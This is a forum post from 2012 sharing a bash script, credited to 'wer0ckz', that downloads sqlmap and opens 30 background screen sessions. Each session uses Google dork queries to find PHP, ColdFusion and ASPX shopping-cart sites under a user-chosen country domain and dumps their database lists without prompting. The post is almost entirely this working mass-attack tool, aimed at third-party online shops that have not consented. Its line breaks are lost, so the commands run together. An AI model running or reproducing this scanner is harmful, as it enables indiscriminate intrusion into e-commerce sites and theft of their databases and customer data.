alien Posted October 21, 2012 Report Posted October 21, 2012 Automated script to scan SQLI by country.#!/bin/bash# [*]# [*] Sqlmap automatic scanner by wer0ckz# [*] This tool is designed to scan sql injection by country specific together with shopping sites targets# [*] It creates 30 screens with sqlmap running# [*]clearecho -n “Enter country (ex. ca, au, ph): ”read -e COUNTRYif [ -d $COUNTRY ]then echo Country $COUNTRY is here. Exit!elseecho “[*] Sqlmap mass scanner by wer0ckz”echo “[*]”echo “[*] Downloading Sqlmap..”echo “[*]”echo “[*]”wget -nv http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gztar zxf sqlmap-0.9.tar.gzmv sqlmap $COUNTRYrm ${COUNTRY}/lib/utils/google.pyecho “[*]”echo “[*] Updating google scanner..”wget -nv https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/utils/google.pymv google.py ${COUNTRY}/lib/utils/google.pyscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop cart” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop cart” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop cart” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop id” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop id” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop id” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop item” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop item” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop item” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop buy” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop buy” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop buy” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop product” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop product” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop product” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart cart” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart cart” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart cart” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart id” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart id” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart id” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart item” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart item” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart item” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart buy” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart buy” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart buy” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart product” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart product” –dbs –batchscreen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart product” –dbs –batchecho “[*]”echo “[*]”echo “[*] Done! 30 sqlmap running”echo “[*] Type ‘screen -r’ to check status”fiSource: http://shipcodex.blogspot.ro/2012/02/sqlmap-automatic-scanner-by-wer0ckz.html Quote